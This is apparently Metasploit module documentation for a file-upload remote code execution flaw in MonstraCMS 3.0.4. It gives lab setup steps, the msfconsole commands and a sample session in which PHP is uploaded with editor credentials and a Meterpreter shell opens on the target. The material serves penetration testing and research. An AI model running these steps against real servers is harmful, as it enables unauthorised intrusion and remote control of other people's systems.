Monstra Fileupload Exec

Description

MonstraCMS 3.0.4 allows users to upload arbitrary files which leads to remote command execution on the remote server. An attacker may choose to upload a file containing PHP code and run this code by accessing the resulting PHP file. This module was tested against MonstraCMS 3.0.4. Additional information and vulnerabilities can be viewed on Exploit-DB 43348.

Verification Steps

Available at Exploit-DB

Vulnerable Application Installation Setup

1. Download Application : https://www.exploit-db.com/apps/23663fc7b47c4c1e476b793ea53660bc-monstra-3.0.4.zip
2. Extract : 23663fc7b47c4c1e476b793ea53660bc-monstra-3.0.4.zip
3. Move In WebDirectory : C:\xampp\htdocs\
4. Now Visit : http://localhost/

Verification Steps

1. Install the application
2. Start msfconsole
3. Do: use exploit/multi/http/monstra_fileupload_exec
4. Do: set rport <port>
5. Do: set rhost <ip>
6. Do: set targeturi monstra
7. Do: set username USERNAME
8. Do: set password PASSWORD
9. Do: check

[*] Monstra CMS: 3.0.4
[+] 192.168.0.101:80 The target is vulnerable.

10. Do: set lport <port>
11. Do: set lhost <ip>
12. Do: exploit
13. You should get a shell.

Scenarios

Monstra CMS on Windows Target

msf exploit(multi/http/monstra_fileupload_exec) > check 

[*] Monstra CMS: 3.0.4
[+] 192.168.0.101:80 The target is vulnerable.
msf exploit(multi/http/monstra_fileupload_exec) > exploit 

[*] Started bind handler
[*] Trying to Login ......
[+] Authentication successful : [ editor : editor ]
[+] CSRF-Token for File Upload : 2a67a7995c15c69a158d897f517e3aff2e3a4ae9
[*] Trying to upload file with malicious Content....
[*] Executing Payload 
[*] Sending stage (37775 bytes) to 192.168.0.101
[*] Meterpreter session 1 opened (10.0.2.15:45689 -> 192.168.0.101:4444) at 2018-06-30 12:39:53 +0530
[+] Deleted TSPfeLYdMP.PHP

meterpreter > sysinfo 
Computer    : 114619-T470P
OS          : Windows NT 114619-T470P 10.0 build 16299 (Windows 10) AMD64
Meterpreter : php/windows
meterpreter >